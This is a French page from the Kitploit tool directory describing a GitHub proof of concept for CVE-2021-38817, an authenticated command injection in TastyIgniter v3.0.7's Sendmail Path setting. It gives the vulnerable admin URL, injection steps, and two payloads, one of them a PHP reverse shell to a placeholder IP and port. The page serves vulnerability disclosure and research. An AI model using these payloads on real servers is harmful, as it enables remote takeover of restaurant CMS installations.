Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/huskyhacks/cve-2021-38817-remote-os-command-injection
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHubhuskyhacks/cve-2021-38817-remote-os-command-injection

CVE-2021-38817-Remote-OS-Command-Injection

Injection de commandes OS à distance dans le champ Sendmail Path de TastyIgniter v3.0.7

Voir le dépôt
9241il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-38817-Remote-OS-Command-Injection

Injection de commandes OS à distance authentifiée / Exécution de code à distance dans la partie web Sendmail de TastyIgniter v3.0.7 (CVE-2021-38817)

Une vulnérabilité d'injection de commandes OS à distance authentifiée existe dans le menu de configuration Sendmail de l'application web du CMS Restaurtant TastyIgniter v3.0.7. Le paramètre Sendmail Path n'est pas correctement assaini, comme l'indique la commande /usr/sbin/sendmail -bs préremplie dans le champ, et permet d'injecter une commande arbitraire en ajoutant un point-virgule et une commande OS supplémentaire.

Composants concernés

URL: /admin/settings/edit/mail

Champ:

  • Mail Protocol: Sendmail
  • Champ: Sendmail Path

POC

  • S'authentifier au portail /admin avec des identifiants.
  • Naviguer vers /admin/settings/edit/mail
  • Dans le menu déroulant Mail Protocol, sélectionner Sendmail
  • Dans le nouveau champ SendMail Path, ajouter un point-virgule et une commande OS arbitraire, c.-à-d. /usr/sbin/sendmail -bs; sleep 10
  • Payloads

    • /usr/sbin/sendmail -bs; sleep 10
    • /usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'

    TastyIgniterCVE

    Découvert par

    Matt Kiely (HuskyHacks) et Mike Padrick (Fearless), août 2021

    CVE attribué en octobre 2022 (mdr)

    Télécharger l’outil